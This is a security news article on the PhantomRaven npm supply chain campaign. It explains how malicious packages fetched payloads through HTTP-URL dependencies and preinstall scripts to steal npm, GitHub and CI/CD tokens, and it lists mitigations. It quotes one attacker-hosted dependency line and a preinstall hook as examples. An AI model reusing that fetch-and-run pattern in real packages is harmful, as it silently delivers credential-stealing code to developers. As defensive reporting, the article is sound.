The ongoing PhantomRaven npm supply chain attack is a sophisticated malware campaign targeting developers worldwide. Since August 2025, the campaign has distributed 126 malicious npm packages that have been downloaded more than 86,000 times. Its goal is to steal npm authentication tokens, GitHub credentials and CI/CD secrets, while employing advanced evasion techniques to bypass many common security tools.
Analysts at Koi Security identified the campaign in October 2025 when their behavioral monitoring system, Wings, flagged suspicious network activity during package installations. All malicious packages made external requests to the same domain, revealing a coordinated global operation.
How the PhantomRaven npm supply chain attack works
Koi researchers reconstructed a clear timeline. The first 21 packages were discovered and removed in August 2025. The attackers quickly adapted and managed to publish another 80 packages between September and October that explicitly avoided common detection mechanisms. The attackers’ infrastructure shows a contrast between technical sophistication and surprisingly sloppy operational security.
To hide malicious code, the attackers used a technique involving remote dynamic dependencies. This allows dependencies to be defined with HTTP URLs instead of referencing the npm registry, for example:
“ui-styles-pkg”: “http://packages.storeartifact.com/ui-styles-pkg.tgz”.
When such a package is installed, npm automatically fetches the external dependency without security validation or transparency.
This means the code published on npmjs.com can appear entirely benign—often a simple “hello world” script—while the real malicious payload is downloaded dynamically from the attacker’s server during installation. In this way, PhantomRaven operators bypass both static code analysis and dependency scanning.
Hidden dependencies and automatic execution
When the invisible dependency arrives on a victim’s machine, the malicious payload is activated immediately via npm lifecycle scripts. The tampered package.json includes a preinstall script, for example “preinstall”: “node index.js”, which runs automatically without the user’s knowledge. It does not matter how deep in the dependency tree the package is—any installation of what appears to be a legitimate package can trigger the malicious execution.
The PhantomRaven npm supply chain attack therefore exploits npm’s flexibility to deliver malicious code in real time. Because each installation fetches the dependency anew from the attacker’s server, the payload can be tailored to the target environment, making detection and mitigation especially difficult.
What the attackers collect
After a successful installation, PhantomRaven systematically gathers email addresses from environment variables, gitconfig files, .npmrc configurations and author fields in package.json. It also exfiltrates CI/CD authentication credentials, including GitHub Actions tokens, GitLab CI keys, Jenkins credentials, CircleCI tokens and npm publishing tokens.
The malware then performs comprehensive system profiling: public IP addresses, hostnames, operating systems, Node.js versions and network configurations are collected to distinguish corporate environments from individual developer machines. That information helps the attackers identify high-value targets where they can gain broader access or pivot further into an organization.
Operational sloppiness and traceability
Despite the technical skill behind the campaign, the infrastructure revealed operational carelessness. Multiple email accounts were created sequentially through free services—from [email protected] to [email protected]—and usernames such as npmhell and npmpackagejpd recur across multiple packages. These inconsistencies allowed researchers to trace the campaign back to a single actor, offering hope for eventual identification and prosecution.
Recommended mitigations
- Rotate all tokens and API keys (GitHub, npm, CI/CD) that may have been exposed.
- Audit package.json files and identify any dependencies that reference HTTP URLs. Block or remove those dependencies.
- Implement SBOM tools such as CycloneDX or SPDX to gain full visibility into dependencies and version histories.
- Limit token scopes, use short-lived secrets, and enable automatic rotation where possible.
- Introduce behavior-based monitoring in CI/CD environments, for example sandbox analysis of new packages before deployment.
- Follow the OWASP Software Component Verification Standard for safe handling of third-party dependencies.
- Consider private npm registries and dependency validation before publishing to reduce the risk of tampering in open ecosystems.
Analysis and industry impact
The growing prevalence of attacks like the PhantomRaven npm supply chain attack highlights how the dependency chain has become one of software’s greatest vulnerabilities. As organizations increasingly rely on open source and thousands of third-party packages, the risk that a single compromised component can cause widespread damage continues to rise.
For businesses in the IT sector, this means security is no longer limited to networks or end users—it extends across the entire development lifecycle. Secure code practices, trusted dependencies and continuous supply chain analysis must become strategic priorities rather than technical afterthoughts.
The campaign also shows that attackers have adopted a developer’s mindset: they leverage legitimate features in tools like npm to distribute malware in ways that appear normal. That shift requires organizations to change how they monitor and verify software, integrating stronger validation and runtime observation into development workflows.
For Swedish and Nordic companies, the incident underscores the need to build expertise in software supply chain security and to follow international standards. Through proactive controls, shared threat intelligence and collaborative efforts, the industry can better prepare for the next major attack.